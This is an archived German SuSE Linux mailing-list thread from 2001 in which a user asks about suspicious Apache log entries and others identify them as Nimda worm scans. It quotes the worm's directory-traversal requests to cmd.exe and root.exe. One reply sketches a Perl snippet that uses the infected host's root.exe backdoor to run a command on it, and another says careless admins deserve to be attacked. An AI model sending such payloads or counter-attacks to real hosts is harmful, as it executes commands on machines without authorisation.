Angriff auf mein System über httpd ?
Hi, ich habe folgendes mehrmals in der /var/log/httpd/access_log --- 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 217.59.45.34 - - [27/Sep/2001:23:26:56 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 217.59.45.34 - - [27/Sep/2001:23:26:56 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 217.59.45.34 - - [27/Sep/2001:23:26:56 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system217.59.45.34 - - [27/Sep/2001:23:26:56 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:56 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 --- Versucht da jemand auf mein System drauf zu kommen ? Der muß wohl denken, ich habe einen IIS !! wenn ich obige QuellIP mit Telnet und Port 80 bzw. 21 verwende, sehe ich das die Gegenstelle einen MS-Server laufen hat. Wie kann ich dem Typen über die IP eine Nachricht zukommen lassen ? Ciao Tobi
Am Donnerstag, 27. September 2001 23:43 schrieb Tobias Geis:
Hi, ich habe folgendes mehrmals in der /var/log/httpd/access_log
--- 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 ---
Versucht da jemand auf mein System drauf zu kommen ? Der muß wohl denken, ich habe einen IIS !!
wenn ich obige QuellIP mit Telnet und Port 80 bzw. 21 verwende, sehe ich das die Gegenstelle einen MS-Server laufen hat.
Wie kann ich dem Typen über die IP eine Nachricht zukommen lassen ?
Ciao Tobi
Hallo Tobi Das ist Nimda. Ist schon mehrmals über die Liste gegangen, was die Einträge im Logfile bedeuten. Für Apache-Anwender ist allerdings nur der Traffic ärgerlich, und der ist nicht unerheblich, wie Du siehst. CU Thorsten -- 'I believe in getting into hot water; it keeps you clean." -- G. K. Chesterton
Also Nimda lässt sich erst einmal die DIR anzeigen um so zu sehen, was er verwenden kann ? Anscheinend scannt Nimda alle T-online IPs. Ich hab noch mehrere davon in meiner Log. Fast jede Minute. Kann man dem IP "Besitzer" nicht irgendwie eine Nachricht zukommen lassen, das er event. Nimda auf dem Rechner hat ? Ciao Tobi ICH LIEBE APACHE !!! Thorsten Körner wrote:
Am Donnerstag, 27. September 2001 23:43 schrieb Tobias Geis:
Hi, ich habe folgendes mehrmals in der /var/log/httpd/access_log
--- 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 ---
Versucht da jemand auf mein System drauf zu kommen ? Der muß wohl denken, ich habe einen IIS !!
wenn ich obige QuellIP mit Telnet und Port 80 bzw. 21 verwende, sehe ich das die Gegenstelle einen MS-Server laufen hat.
Wie kann ich dem Typen über die IP eine Nachricht zukommen lassen ?
Ciao Tobi
Hallo Tobi Das ist Nimda. Ist schon mehrmals über die Liste gegangen, was die Einträge im Logfile bedeuten. Für Apache-Anwender ist allerdings nur der Traffic ärgerlich, und der ist nicht unerheblich, wie Du siehst. CU Thorsten -- 'I believe in getting into hot water; it keeps you clean." -- G. K. Chesterton
Am Donnerstag, 27. September 2001 23:56 schrieb Tobias Geis:
Also Nimda lässt sich erst einmal die DIR anzeigen um so zu sehen, was er verwenden kann ?
Anscheinend scannt Nimda alle T-online IPs. Ich hab noch mehrere davon in meiner Log. Fast jede Minute. Kann man dem IP "Besitzer" nicht irgendwie eine Nachricht zukommen lassen, das er event. Nimda auf dem Rechner hat ?
Ciao Tobi
ICH LIEBE APACHE !!!
Genau Zuhause habe ich zwar auch einen Apachen laufen, zum testen und für die Kids zum HTML lernen und so, aber da habe ich die Firewall auf Reject all Incoming Requests gestellt und alle lassen mich in Ruhe. Auch Nimda. Allerdings sieht jetzt das Firewall-Log immer bestens gefüllt aus ;o) Mich ärgert vor Allem der Netzwerk-Verkehr, der dabei entsteht. CU Thorsten -- Faith, n: That quality which enables us to believe what we know to be untrue.
Am 27-Sep-2001 meinte Tobias Geis folgendes meinen zu muessen
Also Nimda l�sst sich erst einmal die DIR anzeigen um so zu sehen, was er verwenden kann ?
Anscheinend scannt Nimda alle T-online IPs. Ich hab noch mehrere davon in meiner Log. Fast jede Minute. Kann man dem IP "Besitzer" nicht irgendwie eine Nachricht zukommen lassen, das er event. Nimda auf dem Rechner hat ?
Schreib ein Perl-Script das sowas wie use LWP::UserAgent; my $msg = Your+computer+is+infected+by+codered+nimda+Worm+Have+a+nice+day.; ... ... new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+net+send+localhost+$msg"); Danach erstell 'n HTML-Document das Reply
From: "Tobias Geis"
Kann man dem IP "Besitzer" nicht irgendwie eine Nachricht zukommen lassen, das er event. Nimda auf dem Rechner hat ?
Moin, ich bin für zwei IIS-Server verantwortlich. Vor Nimda ist man bereits geschützt, wenn man die Patches gegen den seit MONATEN kursierenden "Code Red" augespielt hat. Um es mal so auszudrücken: Wer sich "Nimda" einfängt, hat entweder unglaubliches Pech, weil er in den 30 Sekunden zwischen installieren und patchen infiziert worden ist (Und auch das muß ganz bestimmt nicht nicht sein, aber OK,...), oder er ist ein kleiner Ignorant, der ohnehin nichts liest, nichts begreift und daher gehört er eigentlich nicht benachrichtigt, sondern attackiert, bis seine Kiste von alleine runterfährt. GRMBL. Die Mühe tät ich mir sparen. Gruß, Ratti
On Thu, Sep 27, 2001 at 11:43:53PM +0200, Tobias Geis wrote:
Hi, ich habe folgendes mehrmals in der /var/log/httpd/access_log [nimda logs]
Versucht da jemand auf mein System drauf zu kommen ? Nein nicht wirklich jemand. Mehr ein "Wurm" als ein jemand.
Der muß wohl denken, ich habe einen IIS !! na ja es ist ihm egal ob Du einen hast oder nicht ;)
wenn ich obige QuellIP mit Telnet und Port 80 bzw. 21 verwende, sehe ich das die Gegenstelle einen MS-Server laufen hat. Muss wohl an der Natur des Wurms liegen ;)
Wie kann ich dem Typen über die IP eine Nachricht zukommen lassen ? Lohnt sich nicht. Ansonsten mal gucken welche Domain und wenn was sinniges dann maila an administrator/admin/abuse/postmaster etc.
[ ] Du warst die letzten Wochen anwesend Sven BTW: Es handelt sich um nimda (admin) Besuch einfach mal die Website des Antivirenprogramms deines Vertrauens und Du wirst mehr Informationen finden. -- Sven Hoexter Earth - Germany - Leverkusen -=|=- e-mail: sven@telelev.net rm -rf /usr/bin/laden One Unix to rule them all, One Resolver to find them, One IP to bring them all and in the zone to bind them
Hi Sven, JA ich war die letzten Wochen anwesend. Hatte aber bis jetzt nicht in die Logs geschaut. Und hatte auch nicht die vielen vielen Mails in dieser Liste komplett gelesen. ICh glaube irgendwo mal ein Tool für Linux gesehen zu haben, was WinPopups auf einem Windows Rechner erstellt. Gibt es sowas ? Ciao Tobias Sven Hoexter wrote:
On Thu, Sep 27, 2001 at 11:43:53PM +0200, Tobias Geis wrote:
Hi, ich habe folgendes mehrmals in der /var/log/httpd/access_log [nimda logs]
Versucht da jemand auf mein System drauf zu kommen ? Nein nicht wirklich jemand. Mehr ein "Wurm" als ein jemand.
Der muß wohl denken, ich habe einen IIS !! na ja es ist ihm egal ob Du einen hast oder nicht ;)
wenn ich obige QuellIP mit Telnet und Port 80 bzw. 21 verwende, sehe ich das die Gegenstelle einen MS-Server laufen hat. Muss wohl an der Natur des Wurms liegen ;)
Wie kann ich dem Typen über die IP eine Nachricht zukommen lassen ? Lohnt sich nicht. Ansonsten mal gucken welche Domain und wenn was sinniges dann maila an administrator/admin/abuse/postmaster etc.
[ ] Du warst die letzten Wochen anwesend
Sven
BTW: Es handelt sich um nimda (admin) Besuch einfach mal die Website des Antivirenprogramms deines Vertrauens und Du wirst mehr Informationen finden.
-- Sven Hoexter Earth - Germany - Leverkusen -=|=- e-mail: sven@telelev.net rm -rf /usr/bin/laden One Unix to rule them all, One Resolver to find them, One IP to bring them all and in the zone to bind them
-- Um die Liste abzubestellen, schicken Sie eine Mail an: suse-linux-unsubscribe@suse.com Um eine Liste aller verfügbaren Kommandos zu bekommen, schicken Sie eine Mail an: suse-linux-help@suse.com
Am Freitag, 28. September 2001 00:19 schrieb Tobias Geis:
Hi Sven,
JA ich war die letzten Wochen anwesend. Hatte aber bis jetzt nicht in die Logs geschaut. Und hatte auch nicht die vielen vielen Mails in dieser Liste komplett gelesen.
ICh glaube irgendwo mal ein Tool für Linux gesehen zu haben, was WinPopups auf einem Windows Rechner erstellt. Gibt es sowas ?
Ciao Tobias
Häh Was soll das denn jetzt werden ?!? CU Thorsten -- Today is the first day of the rest of the mess
-----Original Message----- From: tobias@suse.com [mailto:tobias@suse.com]On Behalf Of Tobias Geis Sent: Friday, September 28, 2001 12:20 AM To: SuSE Subject: Re: Angriff auf mein Systemüber httpd ? Hi Sven, JA ich war die letzten Wochen anwesend. Hatte aber bis jetzt nicht in die Logs geschaut. Und hatte auch nicht die vielen vielen Mails in dieser Liste komplett gelesen. ICh glaube irgendwo mal ein Tool für Linux gesehen zu haben, was WinPopups auf einem Windows Rechner erstellt. Gibt es sowas ? Hallo, smbclient kann das z.B. ... -- MfG Yann Wissenbach www : http://www.world-wide-wait.de http://www.vw-opel-ig.de mail : yann@world-wide-wait.de ICQ : 98297452 Linux - Life is too short for reboots
participants (6)
-
Ratti
-
Schneider Christian
-
Sven Hoexter
-
Thorsten Körner
-
Tobias Geis
-
Yann Wissenbach